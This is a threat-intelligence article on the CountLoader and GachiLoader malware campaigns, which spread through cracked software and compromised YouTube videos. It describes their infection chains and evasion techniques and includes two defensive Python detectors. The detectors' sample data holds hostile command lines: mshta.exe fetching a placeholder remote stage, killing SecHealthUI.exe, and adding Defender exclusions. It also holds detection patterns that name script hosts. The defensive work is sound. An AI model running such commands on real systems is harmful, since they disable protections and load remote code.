Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

 


In late 2025, cybersecurity researchers uncovered a sophisticated and expanding malware distribution campaign that leverages two entirely different but complementary attack vectors — pirated software download sites and compromised YouTube videos — to deliver dangerous malware loaders like CountLoader and GachiLoader. This campaign represents a growing trend in which cybercriminals blend social engineering, legitimate-looking download lures, multi-stage payloads, and the abuse of trusted platforms to compromise victims globally. The Hacker News+1

At its core, this threat showcases how popular user behaviors — such as searching for cracked software or game cheats — are being exploited to bypass traditional security defenses and infect systems with powerful malware families capable of stealing data, maintaining persistence, and enabling further illicit activity. Cypro


The Infection Landscape: Cracked Software as a Malware Vector

1. Why Cracked Software Is Risky

Cracked or pirated software has long been a security minefield. Users seeking unauthorized copies of expensive applications, from office suites to creative tools and games, often download installers hosted on unverified sites. These sites frequently bundle malicious content to lure in victims, promising free or “unlocked” versions of premium products.

In the current campaign, malware operators have exploited this habit by embedding next-stage malware loaders inside the download packages presented as cracked software. Users believe they’re installing a working version of a legitimate product, but what they actually execute is a hidden payload that fetches and runs malware in the background. radar.offseq.com


CountLoader: The Multi-Stage Malware Loader

2. What Is CountLoader?

CountLoader is a modular malware loader that functions as an intermediate stage in a larger infection chain. It does not immediately execute the final malware on its own. Instead, CountLoader’s purpose is to:

  • Establish persistence

  • Evade security defenses

  • Fetch and execute additional malicious files

  • Enable flexible payload delivery depending on the threat actor’s objectives

This modular design allows attackers to customize the malware that ultimately runs on the target machine, making CountLoader a valuable foothold in modern campaigns. radar.offseq.com

3. How Users Get Infected

In the observed attack chain:

  1. Victims visit cracked software sites, often prompted by search results or links shared in forums.

  2. When initiating a download for a desired product (like a cracked version of Microsoft Word), the victim is redirected to a file-hosting service such as MediaFire, where a ZIP archive awaits.

  3. The ZIP contains:

    • An encrypted secondary archive

    • A Word document containing the password to open that archive

    • A renamed legitimate Python interpreter labeled Setup.exe, which actually contains malicious instructions

  4. When the victim runs Setup.exe, it uses the Windows utility mshta.exe to fetch CountLoader 3.2 from a remote server. radar.offseq.com

This step is key — by bundling CountLoader behind a seemingly legitimate utility (Python renamed as Setup.exe) and then using mshta.exe (a trusted Microsoft HTML Application host), the attackers bypass many traditional static security checks, effectively launching the loader without raising immediate suspicion. radar.offseq.com

4. Persistence and Evasion Techniques

Once executed, CountLoader demonstrates several sophisticated behaviors:

  • Persistent Scheduled Task: A scheduled task is created using a misleading name like “GoogleTaskSystem136.0.7023.12”, configured to run every 30 minutes for up to a decade.

  • Security Tool Detection: The malware checks for certain security tools like CrowdStrike Falcon using Windows Management Instrumentation (WMI). Depending on results, execution commands are adapted to avoid detection.

  • Flexible Payload Delivery: CountLoader supports multiple payload actions including downloading and executing executables, DLLs, MSI packages, or Python modules.

  • USB Spreading: It can propagate via removable media by creating malicious shortcuts (LNK files) that run both the original file and the malware.

  • Memory-Only Execution: Payloads can be executed directly in memory (e.g., via PowerShell), enabling fileless execution to evade disk-based defenses. radar.offseq.com

Finally, in observed infections, CountLoader has been used to deliver ACR Stealer — a data-harvesting malware that exfiltrates sensitive information from compromised hosts. radar.offseq.com
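The scheduled task described above has a recognisable shape in its XML definition: a vendor-looking name, a sub-hourly repetition that lasts for years, and a script host such as mshta.exe as the action. The following audit is an added example written for this article, not code from the sources cited here. It reads the XML that `schtasks /query /tn <name> /xml` prints (or that is stored under C:\Windows\System32\Tasks), and the thresholds, the vendor-prefix list and both sample tasks are assumptions.

```python
"""Audit Windows scheduled-task XML for the persistence pattern described above.

Added example, not code from the page's sources. Thresholds, the vendor prefixes
and the two sample tasks below are assumptions. Real task files are UTF-16 with a
BOM; pass their raw bytes (open(path, "rb").read()) and ElementTree handles them.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Signed script hosts that loaders drive instead of dropping their own binary
# (mshta.exe is the one named on the page; the rest are assumed additions).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Directories a vendor's genuine updater task normally runs from.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
# Task-name prefixes that imitate well-known vendors (assumed list).
VENDOR_PREFIXES = ("google", "microsoft", "adobe", "chrome", "onedrive", "nvidia")


def iso_duration_seconds(value: str) -> int:
    """Convert an ISO 8601 duration (PT30M, P3650D, P1Y ...) to seconds.
    Months and years are approximated as 30 and 365 days, enough for thresholds."""
    m = re.fullmatch(r"P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?"
                     r"(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        raise ValueError(f"unrecognised duration: {value!r}")
    y, mo, d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 3600 + mi * 60 + s


def audit_task(task_name: str, xml_text) -> list[str]:
    """Return the reasons a task looks like loader persistence; [] means nothing flagged."""
    root = ET.fromstring(xml_text)
    reasons = []

    # Rule 1: a sub-hourly repetition that lasts for years is a beacon schedule,
    # not a maintenance job.
    for rep in root.iterfind(".//t:Repetition", NS):
        interval = rep.findtext("t:Interval", default="", namespaces=NS)
        duration = rep.findtext("t:Duration", default="", namespaces=NS)
        if interval and duration and iso_duration_seconds(interval) <= 3600 \
                and iso_duration_seconds(duration) >= 365 * 86400:
            reasons.append(f"repeats every {interval} for {duration}")

    # Rule 2: inspect each action for a script host, an untrusted path or a remote URL.
    ran_from_trusted = False
    for action in root.iterfind(".//t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        low = command.lower()
        if low.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            reasons.append(f"action runs script host {command} with arguments {args!r}")
        if low.startswith(TRUSTED_ROOTS):
            ran_from_trusted = True
        elif "\\" in low:
            reasons.append(f"action runs from non-standard path {command}")
        if re.search(r"https?://", args, re.IGNORECASE):
            reasons.append("action passes a remote URL on the command line")

    # Rule 3: a vendor-style name whose actions never touch Program Files or Windows.
    if task_name.lower().startswith(VENDOR_PREFIXES) and not ran_from_trusted:
        reasons.append(f"name {task_name!r} imitates a vendor but does not run from a vendor directory")
    return reasons


# Constructed sample modelled on the task name and schedule the page reports;
# the URL is an obvious placeholder.
SUSPICIOUS_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
      <StartBoundary>2025-11-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>mshta.exe</Command><Arguments>http://EXAMPLE-PLACEHOLDER.invalid/stage</Arguments></Exec>
  </Actions>
</Task>"""

# Constructed benign sample shaped like a real vendor updater task.
BENIGN_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-11-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("GoogleTaskSystem136.0.7023.12", SUSPICIOUS_TASK_XML),
                      ("GoogleUpdateTaskMachineUA", BENIGN_TASK_XML)):
        print(name, "->", audit_task(name, xml) or "clean")
```

Each rule on its own is noisy (plenty of legitimate tasks run PowerShell), so the audit returns all matching reasons and leaves prioritisation to the analyst; a task that trips the schedule rule, the script-host rule and the vendor-name rule at once is the pattern this article describes.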


YouTube Ghost Network and GachiLoader

5. The YouTube Component of the Campaign

Parallel to the cracked software vector, researchers also identified another delivery mechanism through what’s been dubbed the YouTube Ghost Network. In this scheme:

  • Threat actors compromise legitimate YouTube accounts to upload videos that promise cracked software, game cheats, or other enticing content.

  • These videos contain descriptions and links prompting users to download ZIP archives with accompanying passwords — much like the cracked software route.

  • Viewers unwittingly download malware payloads disguised as installers or utilities. Check Point Research

According to security analysts, more than 100 YouTube videos linked to this campaign were identified, accumulating roughly 220,000 views. The videos were spread across dozens of compromised channels over a period stretching back to December 2024. While many have since been removed after being reported, others are likely to reappear under different accounts in the future. Check Point Research


GachiLoader: Stealthy Node.js Malware Loader

6. Introduction to GachiLoader

Unlike CountLoader, which is a modular executable loader, GachiLoader is a heavily obfuscated malware loader written in Node.js. This is notable because most malware is traditionally developed in compiled languages like C/C++ — making a Node.js loader unusual and harder for many traditional security solutions to detect. Check Point Research

GachiLoader’s job, like CountLoader’s, is to serve as a staging point for additional malware — often deploying sophisticated data stealers or other payloads once it has established its presence. Check Point Research

7. Advanced Infection and Evasion Techniques

As part of its operation, GachiLoader employs multiple anti-analysis and stealth techniques, including:

  • Privilege Checks: It runs commands like net session to detect if it’s being debugged or run without required privileges. If it’s not elevated, it attempts to trigger a User Account Control (UAC) prompt, often tricking users into granting permissions.

  • Security Process Manipulation: GachiLoader attempts to terminate Microsoft Defender components such as SecHealthUI.exe and modify Defender exclusions to avoid detection of its staged malware.

  • PE Injection Innovation: In some cases, GachiLoader uses a novel Portable Executable (PE) injection technique that abuses Vectored Exception Handling to load malicious payloads stealthily in memory — bypassing many traditional detection methods.

  • Repeat Payload Delivery: The loader can fetch its final malware directly or through a second-stage loader (referred to as Kidkadi) to further complicate analysis. Check Point Research

One identified final payload delivered via GachiLoader is the Rhadamanthys infostealer, a malware designed to harvest sensitive data from victims once deployed. Check Point Research
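Two of the process chains this article describes leave clear traces in endpoint telemetry: the renamed Python interpreter launching mshta.exe with a remote URL (section 3), and GachiLoader's net session privilege probe followed by tampering with Microsoft Defender (section 7). The detector below is an added example written for this page, not code from Check Point Research or any other source cited here. It runs over constructed Sysmon-style process-creation (Event ID 1) records; the field names are Sysmon's, while the rule names, the interpreter list and the sample events are assumptions. It keeps each process's real binary name from OriginalFileName so that a renamed interpreter is still recognised when it later spawns a child.

```python
"""Flag loader-style process chains in Sysmon-style process-creation records.

Added example, not code from the researchers cited on the page. Field names follow
Sysmon Event ID 1; rule names, runtime lists and the sample events are assumptions.
"""
import json
import re

INTERPRETERS = {"python.exe", "pythonw.exe", "node.exe"}
SCRIPT_RUNTIMES = INTERPRETERS | {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


class ProcessTreeDetector:
    """Stateful detector: feed events in order, get the rule names each one trips."""

    def __init__(self) -> None:
        self.true_name: dict[str, str] = {}  # ProcessGuid -> real binary name

    def feed(self, event: dict) -> list[str]:
        image = basename(event.get("Image", ""))
        original = (event.get("OriginalFileName") or "").lower() or image
        guid = event.get("ProcessGuid")
        if guid:
            self.true_name[guid] = original
        parent_image = event.get("ParentImage", "")
        parent_true = self.true_name.get(event.get("ParentProcessGuid", ""), basename(parent_image))
        cmd = event.get("CommandLine", "").lower()
        hits = []

        # File is called Setup.exe but its version resource says python.exe: the renamed-interpreter lure.
        if original in INTERPRETERS and original != image:
            hits.append("renamed_interpreter")
        # mshta.exe handed a URL by an interpreter, or by anything outside the Windows directory.
        if image == "mshta.exe" and URL_RE.search(cmd) and \
                (parent_true in INTERPRETERS or not parent_image.lower().startswith("c:\\windows\\")):
            hits.append("mshta_remote_content_from_untrusted_parent")
        # `net session` from a script runtime: the privilege probe the page attributes to GachiLoader.
        if image in ("net.exe", "net1.exe") and "session" in cmd and parent_true in SCRIPT_RUNTIMES:
            hits.append("privilege_probe_from_script_runtime")
        # Tampering with Defender's UI process and its exclusion list.
        if image == "taskkill.exe" and "sechealthui.exe" in cmd:
            hits.append("defender_ui_process_killed")
        if image in ("powershell.exe", "pwsh.exe") and "add-mppreference" in cmd and "exclusion" in cmd:
            hits.append("defender_exclusion_added")
        return hits


def scan(jsonl: str) -> list[dict]:
    """Run the detector over newline-delimited JSON events; return flagged events and their rules."""
    detector = ProcessTreeDetector()
    flagged = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = detector.feed(event)
        if hits:
            flagged.append({"image": event.get("Image", ""), "rules": hits})
    return flagged


# Constructed sample events (GUIDs shortened, URL is a placeholder) following the
# chains described on the page, plus one benign browser launch.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessGuid": "{A}", "ParentProcessGuid": "{EXPLORER}", "Image": "C:\\Users\\victim\\Downloads\\Setup.exe", "OriginalFileName": "python.exe", "CommandLine": "\"C:\\Users\\victim\\Downloads\\Setup.exe\"", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "ProcessGuid": "{B}", "ParentProcessGuid": "{A}", "Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE", "CommandLine": "mshta.exe http://EXAMPLE-PLACEHOLDER.invalid/stage", "ParentImage": "C:\\Users\\victim\\Downloads\\Setup.exe"}
{"EventID": 1, "ProcessGuid": "{C}", "ParentProcessGuid": "{EXPLORER}", "Image": "C:\\Users\\victim\\AppData\\Local\\Temp\\upd\\node.exe", "OriginalFileName": "node.exe", "CommandLine": "node.exe app.js", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "ProcessGuid": "{D}", "ParentProcessGuid": "{C}", "Image": "C:\\Windows\\System32\\net.exe", "OriginalFileName": "net.exe", "CommandLine": "net session", "ParentImage": "C:\\Users\\victim\\AppData\\Local\\Temp\\upd\\node.exe"}
{"EventID": 1, "ProcessGuid": "{E}", "ParentProcessGuid": "{C}", "Image": "C:\\Windows\\System32\\taskkill.exe", "OriginalFileName": "taskkill.exe", "CommandLine": "taskkill /F /IM SecHealthUI.exe", "ParentImage": "C:\\Users\\victim\\AppData\\Local\\Temp\\upd\\node.exe"}
{"EventID": 1, "ProcessGuid": "{F}", "ParentProcessGuid": "{C}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell -Command Add-MpPreference -ExclusionPath C:\\Users\\victim\\AppData\\Local\\Temp\\upd", "ParentImage": "C:\\Users\\victim\\AppData\\Local\\Temp\\upd\\node.exe"}
{"EventID": 1, "ProcessGuid": "{G}", "ParentProcessGuid": "{EXPLORER}", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "OriginalFileName": "chrome.exe", "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", "ParentImage": "C:\\Windows\\explorer.exe"}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["image"], "->", ", ".join(hit["rules"]))
```

The parent-name lookup is the point of keeping state: matching on ParentImage alone would miss the mshta launch, because the parent is called Setup.exe, while OriginalFileName recorded at the parent's own creation still says python.exe. In production the same rules map onto a SIEM query keyed on ParentProcessGuid.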


Implications of the Campaign

This multi-vector distribution campaign has several profound implications for cybersecurity:

8. Exploiting User Behavior

By leveraging cracked software and YouTube videos, attackers are exploiting trusted or familiar channels that many users interact with routinely. This makes detection by average users difficult, as downloads appear legitimate at first glance. Cypro

9. Evasion of Traditional Defenses

Both CountLoader and GachiLoader use advanced evasion techniques — from scheduled tasks mimicking legitimate services, to fileless execution and anti-analysis checks that make automatic scanning and sandboxing less effective. radar.offseq.com+1

10. Persistent and Flexible Threat Models

The modular architecture of these loaders means attackers can deliver a wide range of payloads — from credential stealers to remote access tools — depending on their goals. They can adapt the infection chain to target individuals, corporations, or larger infrastructures with custom malware configurations. radar.offseq.com


Defending Against These Threats

Given the sophistication and stealth of these campaigns, organizations and individual users should adopt layered defenses:

11. Avoid Cracked Software

The single most effective mitigation is to never download or install pirated or cracked software. These files are frequently laden with hidden malware that can compromise even well-protected systems. radar.offseq.com

12. Educate Users

Organizations should train users to recognize the risks of third-party download sites and YouTube content promoting unauthorized software or game cheats. Awareness reduces the likelihood of initial infection. Check Point Research

13. Harden Endpoint Security

  • Deploy advanced endpoint detection and response (EDR) capable of spotting fileless executions and suspicious in-memory behaviors.

  • Restrict execution of system utilities that are often abused by malware (e.g., mshta.exe, PowerShell) unless absolutely required.

  • Monitor for unusual scheduled tasks, unexpected network connections, or changes to security software configurations. radar.offseq.com

14. Secure Removable Media Policies

Given CountLoader’s ability to spread via USB removable drives, instituting strict scanning and autorun restrictions for external drives is crucial. radar.offseq.com


A Growing Trend in Malware Distribution

The cracked software and YouTube malware campaign exemplifies how attackers evolve their distribution tactics by abusing familiar platforms and user behaviors to deliver complex multi-stage malware. This campaign combines social engineering, modular malware development, stealthy execution techniques, and exploitation of trusted platforms — illustrating the need for modern security strategies that go beyond simple antivirus tools.

Whether it’s CountLoader’s multi-stage modular loading or GachiLoader’s advanced Node.js obfuscation and injection techniques, users and defenders must recognize that malware is no longer simple — it’s adaptable, hidden behind everyday online activities, and designed to evade detection until it’s too late. Cypro
